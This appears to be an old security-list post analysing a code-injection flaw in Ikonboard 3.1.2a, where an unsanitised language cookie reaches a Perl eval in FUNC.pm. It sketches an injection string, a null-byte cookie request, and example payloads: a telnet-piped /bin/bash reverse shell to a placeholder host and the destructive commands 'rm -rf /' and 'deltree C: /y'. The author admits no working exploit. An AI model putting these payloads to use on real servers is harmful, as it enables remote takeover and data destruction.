Attemps with Ikonboard 3.1.2a
Vender: Jarvis Entertainment
Product: Ikonboard
Version: 3.1.2a and Below (All current versions).
On the topic of the recent post about Ikonboard and it's command execution
vulnerabilities
In FUNC.pm:
# Make sure the cookie data is legal
if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) {
$iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~
s/^([\d\w]+)$/$1/;
}
$default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}
|| $iB::INFO->{'DEFAULT_LANGUAGE'}
|| 'en';
# Quick check to make sure the directory exists
unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") {
$default = 'en';
}
my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area.
'->new();';
eval $code;
$obj->cgi_error("Could not access the language file: $@") if $@;
return $lang;
}
--------------
The first bit is of course where the exploit actualy accures. Although we can
in definitely define $default to our own value I scratched my head for a while
trying to figure out how this could be exploited.
After a few hours of staring i came to the final (and easy) conclusion that is
this:
If $default where to equal: where 'en' is the usualy default string contained
in $default and UniversalWords is contained in $area and then the .pm etc.
$default = "en/UniversalWords.pm\"; <My code> ; ##"
then the eval would simply interpret to the following:
eval require "en/UniversalWords.pm"; <My Code>; ##/" .$area. '.pm"; $lang = '.
$area. '->new().
so what would happen is the eval would do the require on en/UniversalWords.pm
then it would move on to execute whatever arbitrary perl code you placed in <My
Code>. Such as a
" `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse
(hopefully) an deltree C: /y or rm -rf /, seeing as Ikonboard can be ran on
linux or windows.
The meathod of injecting the code we wish into $default would be as simple as
it is in the exploit for 3.1.1:
GET $PATH HTTP/1.1
Host: $HOST
Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters.
Connection: close
-------
As of this moment I have not written a working exploit and am not even 100%
sure if this would work, seeing as the person who posted this vulnerability a
day ago claimed he had a working example I decided to wait on this to see how
it is done.
--K-sPecial